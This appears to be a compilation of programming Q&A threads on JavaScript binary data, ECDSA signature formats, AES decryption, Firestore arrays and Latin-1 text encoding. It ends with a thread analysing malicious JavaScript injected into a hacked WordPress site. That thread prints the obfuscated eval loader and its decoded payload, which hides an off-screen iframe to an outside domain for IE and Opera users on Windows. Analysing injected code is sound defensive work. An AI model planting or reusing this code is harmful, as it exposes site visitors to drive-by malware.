reading content of arraybuffer in javascript send via server (file reader api) - javascript

I am sending a Blob to the server, but when the server sends it back to the client using emit() from the socketio library, it arrives converted to ArrayBuffer(2563)
[[Int8Array]]
:
Int8Array(2563) [100, 105, 115, 116, 114, 105, 98, 117, 116, 105, 111, 110, 32, 118, 115, 32, 118, 97, 114, 97, 98, 108, 105, 116, 121, 32, 32, 111, 114, 32, 115, 116, 97, 110, 100, 97, 114, 100, 32, 100, 101, 118, 105, 97, 116, 105, 111, 110, 13, 10, 13, 10, 13, 10, 115, 99, 97, 108, 101, 32, 111, 102, 32, 115, 99, 97, 116, 116, 101, 114, 32, 112, 108, 111, 116, 13, 10, 108, 105, 110, 110, 101, 114, 32, 112, 97, 116, 116, 101, 114, 32, 111, 102, 32, 108, 105, 110, 101, 32, 105, …]
[[Uint8Array]]
:
Uint8Array(2563) [100, 105, 115, 116, 114, 105, 98, 117, 116, 105, 111, 110, 32, 118, 115, 32, 118, 97, 114, 97, 98, 108, 105, 116, 121, 32, 32, 111, 114, 32, 115, 116, 97, 110, 100, 97, 114, 100, 32, 100, 101, 118, 105, 97, 116, 105, 111, 110, 13, 10, 13, 10, 13, 10, 115, 99, 97, 108, 101, 32, 111, 102, 32, 115, 99, 97, 116, 116, 101, 114, 32, 112, 108, 111, 116, 13, 10, 108, 105, 110, 110, 101, 114, 32, 112, 97, 116, 116, 101, 114, 32, 111, 102, 32, 108, 105, 110, 101, 32, 105, …]
byteLength
:
(...)
I uploaded a text file and sent it to the server; the console output above is what the server sent back. How can I read the file content? I used the FileReader API to convert the file to a Blob, and the server sent it back to me as an ArrayBuffer.
While it was still a File, I could read its content directly on the client side.
When I sent the Blob to the Python server I could read it there too (with print), but now that it has come back to the client as an ArrayBuffer, I don't know how to view its content.

You can make a Blob from an ArrayBuffer, you can then run that Blob through FileReader to get the text
// Wrap the received ArrayBuffer in a Blob and let FileReader decode it as text.
var reader = new FileReader();
reader.onloadend = function () {
  // loadend fires once the read has finished, whether it succeeded or failed,
  // so reader.result holds the decoded text only when the read succeeded.
  console.log("text: ", reader.result);
};
var blob = new Blob([yourArrayBuffer]);
reader.readAsText(blob);

Related

How to verify an ES256 (ECDSA using P-256 and SHA-256) signature with window.crypto.subtle?

I'm having trouble figuring out the right parameters to verify, in web crypto, an ECDSA P-256 signature (SHA-256 hash) against its public key. The script below outputs:
Node verify result: true
Web verify result: false
What are the parameters to make verification work with web crypto too? I think I've tried everything by now except the right thing :|
(BTW tried the web piece in Chrome as well with same result)
const crypto = require("crypto");
const webcrypto = require("node:crypto").webcrypto;
// Public key as base64 of a DER blob; both verifiers below import it as SPKI.
const derEncodedPublicKey = Buffer.from(
"MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAE5/J6xKyJxzOJ85om+jUJUFHMqnpruqXnKx5jKRojB3E1gC29g/kAc6xHunY05IW+gn2oeAdjggnH7a4WQ8/Afg==",
"base64"
);
// The signed message bytes (69 bytes).
const data = new Uint8Array([
73, 150, 13, 229, 136, 14, 140, 104, 116, 52, 23, 15, 100, 118, 96, 91, 143,
228, 174, 185, 162, 134, 50, 199, 153, 92, 243, 186, 131, 29, 151, 99, 5, 0,
0, 0, 0, 182, 173, 217, 158, 122, 216, 45, 140, 214, 44, 204, 209, 62, 118,
45, 12, 238, 10, 91, 88, 80, 235, 131, 5, 70, 171, 245, 252, 71, 13, 207, 235,
]);
// The signature in ASN.1 DER form: 48 (0x30, SEQUENCE) with length 68, then two
// INTEGERs (tag 2), each 32 bytes long here: r followed by s. This is the
// encoding Node's verify accepts by default; WebCrypto expects the 64-byte r || s form instead.
const sig = new Uint8Array([
48, 68, 2, 32, 58, 26, 13, 251, 116, 195, 219, 77, 90, 1, 64, 38, 54, 249, 56,
87, 235, 24, 78, 26, 13, 88, 74, 224, 159, 58, 159, 133, 111, 98, 69, 214, 2,
32, 87, 1, 32, 191, 170, 10, 33, 204, 86, 124, 73, 21, 153, 4, 58, 182, 248,
175, 144, 80, 146, 173, 247, 205, 36, 51, 59, 221, 212, 133, 107, 118,
]);
/**
 * Verify `sig` over `data` with Node's classic crypto API.
 * The public key is imported from its DER/SPKI bytes, and the signature is
 * passed as is (DER-encoded), which is what Node expects by default.
 * @returns {boolean} true when the signature is valid for `data`.
 */
function nodeVerify() {
  const publicKey = crypto.createPublicKey({
    key: derEncodedPublicKey,
    format: "der",
    type: "spki",
  });
  const verifier = crypto.createVerify("SHA256");
  verifier.update(data);
  return verifier.verify(publicKey, sig);
}
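/**
 * Verify `sig` over `data` with WebCrypto.
 *
 * WebCrypto's ECDSA verify expects the signature as fixed-width r || s
 * (64 bytes for P-256), while `sig` is ASN.1 DER (SEQUENCE of two INTEGERs),
 * the form Node's createVerify accepts. Passing the DER bytes straight through
 * makes verify resolve to false, so the signature is converted first.
 *
 * @returns {Promise<boolean>} true when the signature is valid; false when it
 *   is invalid or is not a well-formed DER ECDSA signature (fail closed).
 */
async function webVerify() {
  // Non-extractable, verify-only key: the least privilege this check needs.
  const webkey = await webcrypto.subtle.importKey(
    "spki",
    derEncodedPublicKey,
    {
      name: "ECDSA",
      namedCurve: "P-256",
    },
    false,
    ["verify"]
  );
  // P-256 coordinates are 32 bytes wide.
  const rawSignature = derEcdsaSignatureToRaw(sig, 32);
  if (rawSignature === null) {
    return false;
  }
  return webcrypto.subtle.verify(
    {
      name: "ECDSA",
      hash: "SHA-256",
    },
    webkey,
    rawSignature,
    data
  );
}

// Convert a DER ECDSA signature into fixed-width r || s; returns null when the
// input is not exactly one SEQUENCE holding two INTEGERs that fit `size` bytes.
function derEcdsaSignatureToRaw(der, size) {
  const bytes = der instanceof ArrayBuffer ? new Uint8Array(der) : der;
  let pos = 0;

  // Read a DER length (short form, or long form of at most two bytes); -1 on error.
  const readLength = () => {
    if (pos >= bytes.length) return -1;
    let len = bytes[pos++];
    if (len & 0x80) {
      const count = len & 0x7f;
      if (count === 0 || count > 2 || pos + count > bytes.length) return -1;
      len = 0;
      for (let i = 0; i < count; i++) {
        len = (len << 8) | bytes[pos++];
      }
    }
    return len;
  };

  // Read one INTEGER and return its magnitude without sign-padding zero bytes.
  const readInteger = () => {
    if (pos >= bytes.length || bytes[pos++] !== 0x02) return null;
    const len = readLength();
    if (len <= 0 || pos + len > bytes.length) return null;
    let start = pos;
    const end = pos + len;
    pos = end;
    while (start < end - 1 && bytes[start] === 0) {
      start++;
    }
    return end - start > size ? null : bytes.subarray(start, end);
  };

  if (bytes.length === 0 || bytes[pos++] !== 0x30) return null;
  const sequenceLength = readLength();
  // Reject trailing bytes as well as truncated input.
  if (sequenceLength < 0 || pos + sequenceLength !== bytes.length) return null;
  const r = readInteger();
  if (r === null) return null;
  const s = readInteger();
  if (s === null || pos !== bytes.length) return null;

  // Left-pad each integer with zeros to the fixed width.
  const raw = new Uint8Array(size * 2);
  raw.set(r, size - r.length);
  raw.set(s, size * 2 - s.length);
  return raw;
}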
// Run both verifiers and print their results; any rejection is logged.
async function printVerifyResults() {
  const nodeResult = nodeVerify();
  console.log("Node verify result:", nodeResult);
  const webResult = await webVerify();
  console.log("Web verify result:", webResult);
}
printVerifyResults().catch(console.error);
NodeJS is easier, it needs less parameters :)
Thank you.
After more googling and trying I found the answer: the ECDSA signature that I am using is actually an ASN.1 (DER) encoded structure. NodeJS is fine with that during verification, but webcrypto is not: it wants the raw signature, which is the byte concatenation of the two integers (r and s) in the ASN.1 encoded signature, each written at the curve's fixed width (32 bytes for P-256, 64 bytes in total).
More information in this post: https://crypto.stackexchange.com/questions/57731/ecdsa-signature-rs-to-asn1-der-encoding-question

ICryptoTransform decryptor C# equivalent in reactjs

I am migrating from .NET Core to ReactJS and need to decrypt a hash into an object. I am stuck because the results are not equal. Here is the .NET code.
Note: cipherText length is 656 I can't paste such a long array here.
byte[] cipherText = [132, 185, 138, 129, 38, 216, 49, 48, 25, 139, 187, 146, 67, 234, 194, 143, 252, 214, 245, 230, 30, 238, 235, 53, 155, 136, 0, 112, 76, 27, 205, 84, 124, 250, 74, 114, 208, 227, 148, 135, 112, 168, 171, 73, 45, 122, 31, 248, 186, 80, 148, 143, 251, 216, 90, 152, 138, 130, 148, 199, 178, 151, 151, 195, 252, 43, 67, 183, 45, 24, 228, 73, 208, 249, 155, 36, 78, 232, 210, 20, 235, 109, 206, 245, 180, 28, 227, 32, 202, 143, 255, 110, 128, 38, 101, 174, 253, 80, 171, 201......]
plaintext = null;
byte[] Key = [56, 63, 82, 186, 73, 8, 112, 110, 129, 185, 157, 192, 163, 160, 120, 215, 52, 254, 252, 189, 25, 82, 43, 15, 87, 98, 48, 193, 21, 44, 6, 163]0: 561: 632: 823: 1864: 735: 86: 1127: 1108: 1299: 18510: 15711: 19212: 16313: 16014: 12015: 21516: 5217: 25418: 25219: 18920: 2521: 8222: 4323: 1524: 8725: 9826: 4827: 19328: 2129: 4430: 631: 163];
byte[] IV = [200, 97, 110, 6, 23, 248, 144, 210, 223, 167, 67, 64, 125, 96, 136, 201]
// Decrypts cipherText with AES using the Key and IV declared above and reads the
// result as text into plaintext.
// No Mode or Padding is set here, so the AesManaged defaults apply; the CryptoJS
// port on this page uses CBC with PKCS7 to match.
// NOTE(review): CBC by itself gives no integrity protection. If the ciphertext can
// be modified by another party, authenticate it (a MAC over IV + ciphertext, or an
// AEAD mode) before decrypting - confirm against how this data is produced.
// NOTE(review): Key and IV are literals in this sample; a key that ends up in
// browser-side code is readable by every user of that page.
using (AesManaged aesAlg = new AesManaged())
{
aesAlg.Key = Key;
aesAlg.IV = IV;
ICryptoTransform decryptor = aesAlg.CreateDecryptor(aesAlg.Key, aesAlg.IV);
// Chain: ciphertext bytes -> decrypting stream -> text reader.
using (MemoryStream msDecrypt = new MemoryStream(cipherText))
{
using (CryptoStream csDecrypt = new CryptoStream(msDecrypt, decryptor, CryptoStreamMode.Read))
{
using (StreamReader srDecrypt = new StreamReader(csDecrypt))
{
// Reads the whole decrypted stream as one string.
plaintext = srDecrypt.ReadToEnd();
}
}
}
}
How can I decrypt byte array with cryptojs?
I solved it, Here is the solution:
// AES-CBC / PKCS7 decryption of raw byte arrays with CryptoJS, returning the
// plaintext decoded as UTF-8.
// NOTE(review): CBC provides no integrity check; if the ciphertext comes from an
// untrusted channel, verify a MAC over it before calling decrypt.
// NOTE(review): in a browser app the key material passed in here is visible to
// the user - confirm that this is acceptable for this data.
const bytesToWordArray = (bytes) =>
  CryptoJS.lib.WordArray.create(new Uint8Array(bytes));

const cipherParams = { ciphertext: bytesToWordArray(cipherText) };
const aesOptions = {
  iv: bytesToWordArray(IV),
  padding: CryptoJS.pad.Pkcs7,
  mode: CryptoJS.mode.CBC
};
const decrypted = CryptoJS.AES.decrypt(cipherParams, bytesToWordArray(Key), aesOptions);
return decrypted.toString(CryptoJS.enc.Utf8);

Cannot save to Firestore array of integers and floats

I am using Firestore to save an array of integers and floats.
However, Firestore won't let me save that array and does not return an error (in the catch statement, for example).
My array is the size of 71201
(71201) [84, 96, 96, 96, 91.8, 97, 98, 98, 98, 99, 99, 99, 99, 99, 98, 98, 98, 98, 98, 98, 98, 96, 95, 93, 91, 89, 88, 87, 87, 87, 88, 89, 91, 94, 96, 98, 99, 100, 101, 101, 101, 98, 96, 92, 89, 87, 87, 87, 87, 89, 91, 93, 95, 96, 97, 98, 98, 99, 99, 100, 100, 100, 100, 100, 100, 101, 102, 103, 104, 105, 106, 108, 109, 110, 111, 113, 113, 114, 115, 116, 117, 117, 118, 118, 119, 120, 120, 121, 122, 122, 122, 123, 124, 124, 125, 126, 127, 127, 127, 127, …]
Reading the limit documentation the size of an integer is 8 Bytes
So trying to do some math here (and possibly failing)
71201*8/1024 =
556.2578125
So that is ~556KB
That as I understand is not a problem with the limit.
Also I can only imagine that this is the problem (not accepting this large array) due to the network tab view:
Opening one of the requests looks like this on the headers:
and the response is always empty
The catch statement of the promise does not get called and I have waited for many minutes (neither the then)
// Write the array into a single `values` field of the event's document.
// Both handlers are debugging stubs that only break into the debugger.
const eventDoc = this.afs.collection('events').doc(event.getID());
eventDoc
  .set({ values: test })
  .then((result) => {
    debugger;
  })
  .catch((error) => {
    debugger;
  });
Any ideas what can I be doing wrong?
P.S. It's been now about 20minutes and my network tab keeps growing with those failed requests.
UPDATE
If I Make this array a string via eg JSON.stringify then the operation saves within seconds.

Convert a variable containing UTF8 string to a variable containing latin1 string - for browser in Javascript

Bash alternative (shell set to UTF8):
Input:
in.json
$ file -I in.json
in.json: text/plain; charset=utf-8
{"it-it":"Città"}
Bash command I need the JS alternative for:
$ iconv -f utf8 -t latin1 in.json > out.json
out.json
$ file -I in.json
out.json: text/plain; charset=iso-8859-1
{"it-it":"Citt?"}
What Javascript sees in browser for in.json when read as base64 from an input type="file" (despite content-type and script encoding set to utf8):
{"it-it":"Città"}
What Javascript sees in browser for out.json:
{"it-it":"Città"}
Question - how can I make in the most native Javascript way to make most modern browsers convert this utf8 string
({"it-it":"Città "} as latin1 and {"it-it":"Città"} as utf8)
to a latin1 string?
I prefer a native solution, or worst case JQuery, please try not to solve it with an npm + node dependency hell.
P.s.: I only need to support the most modern browsers, this is for an admin-only page.
Below I've created an array with the iso-8859-1 version of CittÃ, and then used TextDecoder to decode it.
So if you can get the binary version of the JSON, this should be able to convert for you.
//CittÃ
// One byte per character: 67 105 116 116 195.
var latinSource = Uint8Array.of(67, 105, 116, 116, 195);
// Decode the bytes using the "iso-8859-1" label and print the resulting text.
var tc = new TextDecoder("iso-8859-1");
console.log(tc.decode(latinSource));
For me, 'new TextDecoder("iso-8859-1")' not working...
1.
// Every byte value from 0 to 255, in order.
var latinSource = Uint8Array.from({ length: 256 }, (unused, byteValue) => byteValue);
var tc = new TextDecoder("iso-8859-1");
// The decoder resolves the "iso-8859-1" label to windows-1252, so bytes in the
// 128-159 range come out as windows-1252 characters such as '€'.
console.log(tc.decode(latinSource));
As you can see, the result is not a latin1 string, because it contains the character '€'.
2.
//windows-1252
// Print the decoder object itself to see which encoding the label resolved to.
{
  const inspectedDecoder = new TextDecoder("iso-8859-1");
  console.log('new TextDecoder("iso-8859-1")', inspectedDecoder);
}
// Output reported by the author:
//   encoding:  "windows-1252"
//   fatal:     false
//   ignoreBOM: false
//   decode:    function decode() { [native code] }
Working way to encode-decode latin-1:
//Decode Latin1-string (iso-8859-1 encoded string) -> into Uint8Array
/**
 * Turn a string into bytes, one byte per UTF-16 code unit.
 * Code units above 255 are not representable: the Uint8Array store keeps only
 * their low 8 bits, so the input is expected to contain Latin-1 characters only.
 * @param {string} iso_8859_1 - text whose characters are all in U+0000..U+00FF
 * @returns {Uint8Array} the character codes as bytes
 */
function Latin1ToUint8Array(iso_8859_1) {
  return Uint8Array.from(
    { length: iso_8859_1.length },
    (unused, index) => iso_8859_1.charCodeAt(index)
  );
}
//encode Uint8Array -> into iso-8859-1 encoded string (latin1-string)
/**
 * Turn bytes into a string, mapping each byte to the character with the same
 * code (byte 0xC3 becomes U+00C3), which is the ISO-8859-1 mapping.
 * @param {Uint8Array} Uint8Arr - bytes to convert
 * @returns {string} one character per input byte
 */
function Uint8ToLatin1Str(Uint8Arr) {
  const characters = [];
  let index = 0;
  while (index < Uint8Arr.length) {
    characters.push(String.fromCharCode(Uint8Arr[index]));
    index += 1;
  }
  return characters.join('');
}
// Every byte value from 0 to 255, converted with the byte-to-character helper.
var latinSource = Uint8Array.from({ length: 256 }, (unused, byteValue) => byteValue);
console.log(Uint8ToLatin1Str(latinSource)); // valid latin1 string (iso-8859-1)
Finally, Windows-1252 conversions:
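/**
 * Convert between a windows-1252 string and its bytes.
 *
 * - Given a string, returns a Uint8Array with one byte per UTF-16 code unit.
 * - Given a Uint8Array, returns the decoded string.
 * - Any other argument yields undefined.
 *
 * Code units up to 255 are written as the byte of the same value. Characters
 * above 255 are looked up in the windows-1252 table below; a character that is
 * not in the table has no windows-1252 byte and is written as '?' (63) instead
 * of silently turning into a NUL byte.
 *
 * @param {string|Uint8Array} cp1252 - text to encode, or bytes to decode
 * @returns {Uint8Array|string|undefined} bytes for a string, text for bytes
 */
function Windows1252EncodeDecode(
  cp1252 // string (to encode into bytes), or Uint8Array (to decode into string)
) {
  // [windows-1252 byte, Unicode char code] for the bytes in 128-159 whose
  // character differs from the ISO-8859-1 one.
  var differingPairs = [
    [128, 8364], // euro sign
    [130, 8218], // single low-9 quotation mark
    [131, 402], // f with hook
    [132, 8222], // double low-9 quotation mark
    [133, 8230], // horizontal ellipsis
    [134, 8224], // dagger
    [135, 8225], // double dagger
    [136, 710], // modifier circumflex
    [137, 8240], // per mille sign
    [138, 352], // S with caron
    [139, 8249], // single left angle quotation mark
    [140, 338], // OE ligature
    [142, 381], // Z with caron
    [145, 8216], // left single quotation mark
    [146, 8217], // right single quotation mark
    [147, 8220], // left double quotation mark
    [148, 8221], // right double quotation mark
    [149, 8226], // bullet
    [150, 8211], // en dash
    [151, 8212], // em dash
    [152, 732], // small tilde
    [153, 8482], // trade mark sign
    [154, 353], // s with caron
    [155, 8250], // single right angle quotation mark
    [156, 339], // oe ligature
    [158, 382], // z with caron
    [159, 376], // Y with diaeresis
  ];
  // Two lookup maps built once, instead of scanning the table for every byte.
  var byteToCharCode = new Map(differingPairs);
  var charCodeToByte = new Map(
    differingPairs.map(function (pair) {
      return [pair[1], pair[0]];
    })
  );
  var SUBSTITUTE_BYTE = 63; // '?'

  if (typeof cp1252 === 'string') {
    // String -> bytes.
    var resultUint8 = new Uint8Array(cp1252.length);
    for (var i = 0; i < cp1252.length; i++) {
      var charCode = cp1252.charCodeAt(i);
      if (charCode <= 255) {
        resultUint8[i] = charCode;
      } else if (charCodeToByte.has(charCode)) {
        resultUint8[i] = charCodeToByte.get(charCode);
      } else {
        resultUint8[i] = SUBSTITUTE_BYTE;
      }
    }
    return resultUint8; // Uint8Array
  } else if (cp1252 instanceof Uint8Array) {
    // Bytes -> string.
    var resultString = "";
    for (var k = 0; k < cp1252.length; k++) {
      var mappedCharCode = byteToCharCode.get(cp1252[k]);
      resultString += String.fromCharCode(
        mappedCharCode === undefined ? cp1252[k] : mappedCharCode
      );
    }
    return resultString; // string
  }
}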
// Round-trip check: decode all 256 byte values with TextDecoder, encode the
// text back to bytes, decode those bytes again and compare with TextDecoder.
var latinSource = Uint8Array.from({ length: 256 }, (unused, byteValue) => byteValue);
var windows1252 = new TextDecoder("iso-8859-1").decode(latinSource); // windows-1252 string on output
console.log('new TextDecoder("iso-8859-1").decode(latinSource)', windows1252);

var bytesBack = Windows1252EncodeDecode(windows1252);
console.log('bytesBack', bytesBack.toString());

var Windows1252StringBack = Windows1252EncodeDecode(bytesBack);
console.log('string back', Windows1252StringBack);

var matchesTextDecoder = Windows1252StringBack === windows1252;
console.log('Compare with TextDecoder', matchesTextDecoder);
Modification of latin-1 functions, from 3:
/**
 * Report whether every character of `str` lies in U+0000..U+00FF.
 * @param {string} str - text to inspect
 * @returns {boolean} true when no character is above U+00FF
 */
function isLatin1String(str) {
  const firstOutsideLatin1 = str.search(/[^\u0000-\u00FF]/);
  return firstOutsideLatin1 === -1;
}
//Decode Latin1 or utf-8 string -> into Uint8Array
/**
 * Turn a string into bytes.
 * A string made only of characters up to U+00FF is written one byte per
 * character; any other string is encoded as UTF-8.
 * NOTE(review): the returned bytes do not record which of the two encodings
 * was used, so a consumer has to know it some other way - confirm with callers.
 * @param {string} str - text to convert
 * @returns {Uint8Array} the resulting bytes
 */
function StringToUint8Array(str) {
  if (isLatin1String(str)) {
    // Latin-1 path: the character code is the byte value.
    return Uint8Array.from(
      { length: str.length },
      (unused, index) => str.charCodeAt(index)
    );
  }
  // Anything else is encoded as UTF-8.
  return new TextEncoder("utf-8").encode(str);
}
//encode Uint8Array -> to latin1-string
/**
 * Build a string from bytes, one character per byte, using each byte value as
 * the character code.
 * @param {Uint8Array} Uint8Arr - bytes to convert
 * @returns {string} one character per input byte
 */
function Uint8ToStr(Uint8Arr) {
  return Array.from(
    { length: Uint8Arr.length },
    (unused, index) => String.fromCharCode(Uint8Arr[index])
  ).join('');
}
/**
 * Convert the string to bytes with StringToUint8Array and decode those bytes
 * as UTF-8. The decoder is not in fatal mode, so byte sequences that are not
 * valid UTF-8 come out as replacement characters instead of raising an error.
 * @param {string} latin1str - text whose character codes are UTF-8 byte values
 * @returns {string} the decoded text
 */
function latin1ToUtf8(latin1str) {
  const rawBytes = StringToUint8Array(latin1str);
  const utf8Decoder = new TextDecoder("utf-8");
  return utf8Decoder.decode(rawBytes);
}
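// Demonstration calls. Each label repeats the expression that is evaluated;
// the fourth label previously named "Città" while the call used "Città€".
console.log('StringToUint8Array("CittÃ")', StringToUint8Array("CittÃ")); //Latin1
console.log('StringToUint8Array("Città€")', StringToUint8Array("Città€")); //utf-8
console.log('Uint8ToStr(StringToUint8Array("CittÃ"))', Uint8ToStr(StringToUint8Array("CittÃ"))); //latin1
console.log('Uint8ToStr(StringToUint8Array("Città€"))', Uint8ToStr(StringToUint8Array("Città€"))); //utf-8
console.log('latin1ToUtf8(Uint8ToStr(StringToUint8Array("Città€")))', latin1ToUtf8(Uint8ToStr(StringToUint8Array("Città€")))); //utf-8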

javascript injected into site hack

My friend's WordPress site was attacked and a bunch of PHP files were injected with some eval statements, which I've inflated and decoded, but that has led me to the JavaScript below.
Does anyone have any ideas how to deobfuscate this so we can read what it says?
// Injected loader as found on the compromised site, kept unchanged as a sample.
// In this copy the contents of the `new Array(...)` literal are missing; a
// formatted copy that includes the array appears further down the page.
// It builds the name "eval" from string pieces, decodes the numeric array into
// a string with String.fromCharCode, and passes that string to eval.
ww=window;v="v"+"al";if(ww.document)try{document.body=12;}catch(gdsgsdg){asd=0;try{d=document}catch(agdsg){asd=1;}if(!asd){w={a:ww}.a;v="e".concat(v);}}e=w[v];if(1){f=new Array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}w=f;s=[];for(i=0;-i+800!=0;i+=1){j=i;if((031==0x19))if(e)s=s+String.fromCharCode((1*w[j]+e("j%4")));}xz=e;try{document.body++}catch(gdsgd){xz(s)}
The hidden code is this:
// Decoded payload, kept unchanged as a sample (the iframe host is masked here).
// gra(a,b): random integer between a and b inclusive.
function gra(a,b){return Math.floor(Math.random()*(b-a+1))+a;}
// rs(): short random base-36 string.
function rs(){return Math.random().toString(36).substring(5);}
// Everything below runs only when the browser reports cookies as enabled.
if(navigator.cookieEnabled){
var stnm=rs();
var ua = navigator.userAgent;
var url = document.location.href;
// Targeting: the page URL must not contain 'admin', and the user agent must
// contain 'Windows' together with 'MSIE' or 'Opera'.
if(url.indexOf('admin')==-1 && ua.indexOf('Windows')!=-1 && (ua.indexOf('MSIE')!=-1||ua.indexOf('Opera')!=-1)){
// Writes a style rule with a random class name that positions a div 600-1000px
// off-screen, and inside it an iframe of random size (300-600px) loading feed.php.
document.write('<style>.s'+stnm+' { position:absolute; left:-'+gra(600,1000)+'px; top:-'+gra(600,1000)+'px; }</style> <div class="s'+stnm+'"><iframe src="http://xxxxxxxxxxxx.info/ad/feed.php" width="'+gra(300,600)+'" height="'+gra(300,600)+'"></iframe></div>');
}
// Sets a '__utmfr' cookie with a random value and a 7-day expiry when absent.
// The cookie is not checked before the iframe is written in this snippet.
var exp=new Date();exp.setDate(exp.getDate()+7);
if(document.cookie.indexOf('__utmfr=')==-1){document.cookie='__utmfr='+rs()+'; expires='+exp.toGMTString()+'; path=/';}
}
It's stored in the f array as simple ASCII codes, but each group of four characters is offset by 0, 1, 2 and 3 in turn (the loop adds index % 4 back to each code before decoding) in a simple attempt to obfuscate the code.
Looks like this adds a bit of code to every webpage to display a malicious url in an i-frame.
First, feed it through http://jsbeautifier.org/.
You can now easily deduce that v becomes the string "eval", and e is the eval function. Also, you can run the loop that builds the string from the array items to see what it does:
// Decoded payload, kept unchanged as a sample.
// gra(a,b): random integer between a and b inclusive.
function gra(a,b){return Math.floor(Math.random()*(b-a+1))+a;}
// rs(): short random base-36 string.
function rs(){return Math.random().toString(36).substring(5);}
// Everything below runs only when the browser reports cookies as enabled.
if(navigator.cookieEnabled){
var stnm=rs();
var ua = navigator.userAgent;
var url = document.location.href;
// Targeting: the page URL must not contain 'admin', and the user agent must
// contain 'Windows' together with 'MSIE' or 'Opera'.
if(url.indexOf('admin')==-1 && ua.indexOf('Windows')!=-1 && (ua.indexOf('MSIE')!=-1||ua.indexOf('Opera')!=-1)){
// Writes a style rule with a random class name that positions a div 600-1000px
// off-screen, and inside it an iframe of random size (300-600px) loading feed.php.
document.write('<style>.s'+stnm+' { position:absolute; left:-'+gra(600,1000)+'px; top:-'+gra(600,1000)+'px; }</style> <div class="s'+stnm+'"><iframe src="http://pulldownlays.info/ad/feed.php" width="'+gra(300,600)+'" height="'+gra(300,600)+'"></iframe></div>');
}
// Sets a '__utmfr' cookie with a random value and a 7-day expiry when absent.
// The cookie is not checked before the iframe is written in this snippet.
var exp=new Date();exp.setDate(exp.getDate()+7);
if(document.cookie.indexOf('__utmfr=')==-1){document.cookie='__utmfr='+rs()+'; expires='+exp.toGMTString()+'; path=/';}
}
Now it is quite obvious: It sets a random identifier cookie, and for every IE/Opera user on Windows who does not browse an "admin" url, it creates an iframe which is positioned off-screen. The iframe likely contains some drive-by-download of malware.
I just pasted this into http://jsbeautifier.org/... Good luck!
// Formatted copy of the injected loader, first part: obtaining eval.
// All names are implicit globals. The word "eval" is assembled from pieces so
// that it never appears as a literal in the source.
ww = window;
v = "v" + "al";
// `w` is assigned and `v` is completed to "eval" only inside the catch branch,
// that is, only when the assignment to document.body throws.
// NOTE(review): presumably a check for a real browser DOM, where that
// assignment is expected to throw - confirm.
if (ww.document) try {
document.body = 12;
} catch (gdsgsdg) {
asd = 0;
try {
d = document
} catch (agdsg) {
asd = 1;
}
if (!asd) {
// {a: ww}.a is simply ww, the window object.
w = {
a: ww
}.a;
// "e" + "val"
v = "e".concat(v);
}
}
// e is window["eval"] when the branch above ran.
e = w[v];
if (1) {
f = new Array(102, 116, 108, 96, 116, 104, 109, 107, 32, 102, 112, 94, 40, 96, 42, 95, 41, 122, 112, 98, 116, 116, 112, 107, 32, 76, 95, 113, 104, 45, 100, 105, 111, 110, 112, 37, 77, 96, 114, 101, 46, 113, 95, 107, 100, 110, 107, 37, 41, 41, 38, 95, 45, 96, 41, 46, 41, 40, 41, 94, 59, 124, 11, 7, 102, 116, 108, 96, 116, 104, 109, 107, 32, 113, 113, 37, 41, 122, 112, 98, 116, 116, 112, 107, 32, 76, 95, 113, 104, 45, 112, 94, 110, 99, 109, 106, 40, 40, 44, 113, 111, 82, 114, 111, 105, 109, 101, 37, 51, 53, 39, 43, 115, 116, 96, 112, 116, 113, 103, 107, 103, 39, 51, 38, 59, 124, 11, 7, 105, 101, 38, 107, 97, 117, 103, 100, 97, 115, 109, 111, 46, 98, 109, 108, 107, 104, 99, 66, 110, 96, 96, 105, 101, 99, 39, 120, 13, 9, 7, 115, 97, 113, 30, 112, 116, 109, 107, 58, 114, 114, 38, 38, 59, 12, 8, 6, 118, 96, 112, 29, 117, 96, 30, 58, 32, 109, 95, 115, 105, 102, 95, 113, 111, 113, 44, 114, 115, 100, 112, 62, 103, 100, 108, 113, 59, 12, 8, 6, 118, 96, 112, 29, 117, 113, 106, 29, 61, 31, 98, 108, 99, 116, 107, 98, 110, 115, 44, 105, 111, 98, 95, 113, 105, 110, 108, 43, 104, 113, 99, 99, 59, 12, 8, 6, 105, 101, 38, 114, 114, 107, 44, 102, 110, 99, 99, 117, 79, 101, 38, 36, 97, 99, 107, 102, 110, 38, 39, 58, 61, 44, 47, 29, 38, 37, 30, 114, 97, 45, 103, 107, 100, 100, 118, 76, 102, 39, 37, 84, 105, 109, 98, 108, 119, 114, 37, 38, 33, 60, 43, 46, 32, 37, 36, 29, 40, 116, 95, 43, 105, 109, 98, 98, 120, 78, 100, 37, 39, 76, 81, 70, 69, 38, 39, 30, 61, 44, 47, 121, 124, 116, 95, 43, 105, 109, 98, 98, 120, 78, 100, 37, 39, 78, 110, 98, 114, 96, 37, 38, 33, 60, 43, 46, 41, 40, 121, 10, 10, 8, 7, 97, 111, 98, 115, 106, 101, 109, 114, 43, 119, 113, 103, 113, 101, 39, 37, 57, 115, 115, 119, 105, 101, 61, 44, 112, 39, 42, 113, 113, 110, 108, 41, 36, 32, 122, 30, 109, 111, 114, 103, 113, 105, 110, 108, 55, 97, 97, 113, 108, 108, 116, 114, 98, 59, 31, 106, 98, 102, 115, 56, 42, 39, 42, 101, 111, 97, 39, 52, 45, 48, 43, 47, 45, 48, 47, 39, 40, 39, 111, 118, 56, 32, 115, 109, 109, 58, 44, 
